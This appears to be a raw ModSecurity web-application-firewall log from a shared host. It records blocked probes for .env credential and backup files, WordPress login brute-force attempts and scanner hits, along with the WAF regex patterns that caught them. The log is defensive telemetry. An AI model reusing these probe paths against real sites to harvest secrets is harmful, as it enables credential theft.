[Tue May 26 14:47:01.297305 2026] [security2:error] [pid 648203:tid 648298] [remote 195.178.110.199:43126] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.koneksi.jhonweb.com"] [uri "/index.php"] [unique_id "ahVlCrEQDDtxJNiDrdTNSwAA414"]
[Tue May 26 14:47:01.299497 2026] [security2:error] [pid 648203:tid 648299] [remote 195.178.110.199:43126] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.koneksi.jhonweb.com"] [uri "/index.php"] [unique_id "ahVlCrEQDDtxJNiDrdTNTgAA418"]
[Tue May 26 14:47:01.302305 2026] [security2:error] [pid 648203:tid 648284] [remote 195.178.110.199:43126] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.koneksi.jhonweb.com"] [uri "/index.php"] [unique_id "ahVlCrEQDDtxJNiDrdTNRgAA41A"]
[Tue May 26 14:47:01.309961 2026] [security2:error] [pid 648203:tid 648427] [client 195.178.110.199:43126] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.koneksi.jhonweb.com"] [uri "/index.php"] [unique_id "ahVlC7EQDDtxJNiDrdTNVQAA42U"]
[Tue May 26 14:47:01.310581 2026] [security2:error] [pid 648203:tid 648427] [client 195.178.110.199:43126] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.koneksi.jhonweb.com"] [uri "/index.php"] [unique_id "ahVlDLEQDDtxJNiDrdTNXwAA4wA"]
[Tue May 26 14:47:01.311844 2026] [security2:error] [pid 648203:tid 648427] [client 195.178.110.199:43126] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.koneksi.jhonweb.com"] [uri "/index.php"] [unique_id "ahVlDLEQDDtxJNiDrdTNYQAA4wI"]
[Tue May 26 14:47:01.455440 2026] [security2:error] [pid 648203:tid 648427] [client 195.178.110.199:43126] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.koneksi.jhonweb.com"] [uri "/index.php"] [unique_id "ahVlDLEQDDtxJNiDrdTNkAAA41A"]
[Tue May 26 14:47:01.457155 2026] [security2:error] [pid 648203:tid 648427] [client 195.178.110.199:43126] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.koneksi.jhonweb.com"] [uri "/index.php"] [unique_id "ahVlDLEQDDtxJNiDrdTNbAAA4wQ"]
[Tue May 26 14:47:01.457741 2026] [security2:error] [pid 648203:tid 648427] [client 195.178.110.199:43126] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.koneksi.jhonweb.com"] [uri "/index.php"] [unique_id "ahVlDLEQDDtxJNiDrdTNawAA4wU"]
[Tue May 26 14:47:01.472045 2026] [security2:error] [pid 648203:tid 648427] [client 195.178.110.199:43126] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.koneksi.jhonweb.com"] [uri "/index.php"] [unique_id "ahVlDLEQDDtxJNiDrdTNkgAA42U"]
[Tue May 26 14:47:01.482374 2026] [security2:error] [pid 648203:tid 648427] [client 195.178.110.199:43126] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.koneksi.jhonweb.com"] [uri "/index.php"] [unique_id "ahVlDLEQDDtxJNiDrdTNagAA4wE"]
[Tue May 26 14:47:01.540257 2026] [security2:error] [pid 648203:tid 648358] [client 208.84.100.109:52106] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "webmail.cagmedya.com"] [uri "/___proxy_subdomain_webmail/.env.production.copy"] [unique_id "ahVlDbEQDDtxJNiDrdTNnAAAAJ4"]
[Tue May 26 14:47:02.016826 2026] [security2:error] [pid 648203:tid 648341] [client 57.141.2.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVlDbEQDDtxJNiDrdTNnwAAAI0"]
[Tue May 26 14:47:02.146583 2026] [security2:error] [pid 648203:tid 648407] [client 208.84.100.109:13972] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "webmail.cagmedya.com"] [uri "/___proxy_subdomain_webmail/.env.production~"] [unique_id "ahVlDrEQDDtxJNiDrdTNuQAAAM8"]
[Tue May 26 14:47:02.233672 2026] [security2:error] [pid 648203:tid 648425] [client 208.84.100.109:13966] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "webmail.cagmedya.com"] [uri "/___proxy_subdomain_webmail/.env.production.backup"] [unique_id "ahVlDrEQDDtxJNiDrdTNuwAAAOE"]
[Tue May 26 14:47:02.233763 2026] [security2:error] [pid 648203:tid 648399] [client 208.84.100.109:13958] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "webmail.cagmedya.com"] [uri "/___proxy_subdomain_webmail/.env.production.old"] [unique_id "ahVlDrEQDDtxJNiDrdTNugAAAMc"]
[Tue May 26 14:47:02.234357 2026] [security2:error] [pid 648203:tid 648370] [client 208.84.100.109:13950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "webmail.cagmedya.com"] [uri "/___proxy_subdomain_webmail/.env.production.bak"] [unique_id "ahVlDrEQDDtxJNiDrdTNvAAAAKo"]
[Tue May 26 14:47:02.245688 2026] [security2:error] [pid 648203:tid 648376] [client 208.84.100.109:14004] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "webmail.cagmedya.com"] [uri "/___proxy_subdomain_webmail/.env.local.old"] [unique_id "ahVlDrEQDDtxJNiDrdTNvQAAALA"]
[Tue May 26 14:47:02.248417 2026] [security2:error] [pid 648203:tid 648408] [client 208.84.100.109:13928] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "webmail.cagmedya.com"] [uri "/___proxy_subdomain_webmail/.env.local.swp"] [unique_id "ahVlDrEQDDtxJNiDrdTNwAAAANA"]
[Tue May 26 14:47:02.248971 2026] [security2:error] [pid 648203:tid 648444] [client 208.84.100.109:13846] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "webmail.cagmedya.com"] [uri "/___proxy_subdomain_webmail/.env~"] [unique_id "ahVlDrEQDDtxJNiDrdTNxwAAAPQ"]
[Tue May 26 14:47:02.249184 2026] [security2:error] [pid 648203:tid 648445] [client 208.84.100.109:13866] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "webmail.cagmedya.com"] [uri "/___proxy_subdomain_webmail/.env.orig"] [unique_id "ahVlDrEQDDtxJNiDrdTNywAAAPU"]
[Tue May 26 14:47:02.249203 2026] [security2:error] [pid 648203:tid 648362] [client 208.84.100.109:13940] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "webmail.cagmedya.com"] [uri "/___proxy_subdomain_webmail/.env.local.copy"] [unique_id "ahVlDrEQDDtxJNiDrdTNvwAAAKI"]
[Tue May 26 14:47:02.249402 2026] [security2:error] [pid 648203:tid 648449] [client 208.84.100.109:13914] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "webmail.cagmedya.com"] [uri "/___proxy_subdomain_webmail/.env.local~"] [unique_id "ahVlDrEQDDtxJNiDrdTNwQAAAPk"]
[Tue May 26 14:47:02.249525 2026] [security2:error] [pid 648203:tid 648365] [client 208.84.100.109:13854] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "webmail.cagmedya.com"] [uri "/___proxy_subdomain_webmail/.env.swp"] [unique_id "ahVlDrEQDDtxJNiDrdTNxgAAAKU"]
[Tue May 26 14:47:02.250023 2026] [security2:error] [pid 648203:tid 648369] [client 208.84.100.109:13894] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "webmail.cagmedya.com"] [uri "/___proxy_subdomain_webmail/.env.local.bak"] [unique_id "ahVlDrEQDDtxJNiDrdTNxAAAAKk"]
[Tue May 26 14:47:02.250353 2026] [security2:error] [pid 648203:tid 648361] [client 208.84.100.109:13882] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "webmail.cagmedya.com"] [uri "/___proxy_subdomain_webmail/.env.copy"] [unique_id "ahVlDrEQDDtxJNiDrdTNxQAAAKE"]
[Tue May 26 14:47:02.250525 2026] [security2:error] [pid 648203:tid 648459] [client 208.84.100.109:13902] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "webmail.cagmedya.com"] [uri "/___proxy_subdomain_webmail/.env.local.backup"] [unique_id "ahVlDrEQDDtxJNiDrdTNwgAAAQM"]
[Tue May 26 14:47:02.250525 2026] [security2:error] [pid 648203:tid 648410] [client 208.84.100.109:13818] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "webmail.cagmedya.com"] [uri "/___proxy_subdomain_webmail/.env.old"] [unique_id "ahVlDrEQDDtxJNiDrdTNyAAAANI"]
[Tue May 26 14:47:02.251377 2026] [security2:error] [pid 648203:tid 648427] [client 208.84.100.109:13828] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "webmail.cagmedya.com"] [uri "/___proxy_subdomain_webmail/.env.backup"] [unique_id "ahVlDrEQDDtxJNiDrdTNygAAAOM"]
[Tue May 26 14:47:02.251448 2026] [security2:error] [pid 648203:tid 648435] [client 208.84.100.109:13812] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "webmail.cagmedya.com"] [uri "/___proxy_subdomain_webmail/.env.bak"] [unique_id "ahVlDrEQDDtxJNiDrdTNzQAAAOs"]
[Tue May 26 14:47:02.252286 2026] [security2:error] [pid 648203:tid 648421] [client 208.84.100.109:13932] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "webmail.cagmedya.com"] [uri "/___proxy_subdomain_webmail/.env.local.orig"] [unique_id "ahVlDrEQDDtxJNiDrdTNzwAAAN0"]
[Tue May 26 14:47:02.260492 2026] [security2:error] [pid 648203:tid 648434] [client 20.12.190.196:55248] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.190.12.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cbdcredentials.com.md-74.webhostbox.net"] [uri "/x402.php"] [unique_id "ahVlDrEQDDtxJNiDrdTN1AAAAOo"]
[Tue May 26 14:47:02.260573 2026] [security2:error] [pid 648203:tid 648434] [client 20.12.190.196:55248] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cbdcredentials.com.md-74.webhostbox.net"] [uri "/x402.php"] [unique_id "ahVlDrEQDDtxJNiDrdTN1AAAAOo"]
[Tue May 26 14:47:02.335013 2026] [security2:error] [pid 648203:tid 648424] [client 208.84.100.109:52106] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "webmail.cagmedya.com"] [uri "/___proxy_subdomain_webmail/.env.production.swp"] [unique_id "ahVlDrEQDDtxJNiDrdTN3gAAAOA"]
[Tue May 26 14:47:02.337179 2026] [security2:error] [pid 648203:tid 648437] [client 208.84.100.109:13986] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "webmail.cagmedya.com"] [uri "/___proxy_subdomain_webmail/.env.production.orig"] [unique_id "ahVlDrEQDDtxJNiDrdTN3wAAAO0"]
[Tue May 26 14:47:02.565143 2026] [security2:error] [pid 648203:tid 648357] [client 85.204.70.106:46100] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 106.70.204.85.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "avprealty.com"] [uri "/xmlrpc.php"] [unique_id "ahVlDrEQDDtxJNiDrdTN5gAAAJ0"]
[Tue May 26 14:47:02.565296 2026] [security2:error] [pid 648203:tid 648357] [client 85.204.70.106:46100] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "avprealty.com"] [uri "/xmlrpc.php"] [unique_id "ahVlDrEQDDtxJNiDrdTN5gAAAJ0"]
[Tue May 26 14:47:03.140636 2026] [security2:error] [pid 648203:tid 648355] [client 209.50.170.170:62079] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVlDrEQDDtxJNiDrdTNuAAAAJs"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:47:04.023750 2026] [security2:error] [pid 648203:tid 648449] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVlD7EQDDtxJNiDrdTOBgAAAPk"]
[Tue May 26 14:47:04.338982 2026] [security2:error] [pid 648203:tid 648398] [client 20.12.190.196:55676] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.190.12.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cbdcredentials.com.md-74.webhostbox.net"] [uri "/themes.php"] [unique_id "ahVlELEQDDtxJNiDrdTOHAAAAMY"]
[Tue May 26 14:47:04.339205 2026] [security2:error] [pid 648203:tid 648398] [client 20.12.190.196:55676] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cbdcredentials.com.md-74.webhostbox.net"] [uri "/themes.php"] [unique_id "ahVlELEQDDtxJNiDrdTOHAAAAMY"]
[Tue May 26 14:47:04.452014 2026] [security2:error] [pid 648203:tid 648451] [client 216.26.237.196:35215] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.237.26.216.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVlELEQDDtxJNiDrdTOEwAAAPs"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:47:04.452199 2026] [security2:error] [pid 648203:tid 648351] [client 114.119.145.150:38001] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/list/"] [unique_id "ahVlELEQDDtxJNiDrdTOHgAAAJc"], referer: https://theafterglow-centre.com/events/list/?tribe-bar-date=2024-06-01
[Tue May 26 14:47:06.271454 2026] [security2:error] [pid 648203:tid 648361] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVlEbEQDDtxJNiDrdTOPQAAAKE"]
[Tue May 26 14:47:06.563910 2026] [security2:error] [pid 648203:tid 648446] [client 65.111.4.30:11387] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVlEbEQDDtxJNiDrdTOMgAAAPY"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:47:08.554974 2026] [security2:error] [pid 648203:tid 648334] [client 57.141.2.25:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVlFLEQDDtxJNiDrdTOZwAAAIY"]
[Tue May 26 14:47:08.663830 2026] [security2:error] [pid 648203:tid 648364] [client 216.26.227.59:9657] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVlE7EQDDtxJNiDrdTOXAAAAKQ"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:47:09.674695 2026] [security2:error] [pid 648203:tid 648345] [client 195.178.110.34:57500] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpanel.consultrgb.com"] [uri "/___proxy_subdomain_cpanel/prod/.env"] [unique_id "ahVlFbEQDDtxJNiDrdTOmgAAAJE"]
[Tue May 26 14:47:10.260085 2026] [security2:error] [pid 648203:tid 648381] [client 57.141.2.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVlFbEQDDtxJNiDrdTOpQAAALU"]
[Tue May 26 14:47:10.840023 2026] [security2:error] [pid 648203:tid 648398] [client 209.50.187.129:23313] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVlFbEQDDtxJNiDrdTOlwAAAMY"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:47:13.034274 2026] [security2:error] [pid 648203:tid 648367] [client 57.141.2.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVlGLEQDDtxJNiDrdTO8AAAAKc"]
[Tue May 26 14:47:13.035123 2026] [security2:error] [pid 648203:tid 648374] [client 104.207.60.174:43137] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVlF7EQDDtxJNiDrdTO4wAAAK4"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:47:13.193781 2026] [security2:error] [pid 648203:tid 648339] [client 172.98.32.50:38483] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 50.32.98.172.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "rohiniventures.com"] [uri "/wp-login.php"] [unique_id "ahVlGLEQDDtxJNiDrdTPAQAAAIs"]
[Tue May 26 14:47:15.163853 2026] [security2:error] [pid 648203:tid 648394] [client 45.3.55.135:54427] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVlGrEQDDtxJNiDrdTPJAAAAMI"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:47:15.371345 2026] [security2:error] [pid 648203:tid 648403] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVlGrEQDDtxJNiDrdTPQwAAAMs"]
[Tue May 26 14:47:16.429687 2026] [security2:error] [pid 648203:tid 648452] [client 45.3.44.233:12631] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 233.44.3.45.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVlHLEQDDtxJNiDrdTPbQAAAPw"], referer: https://velanstore.ca/wp-login.php
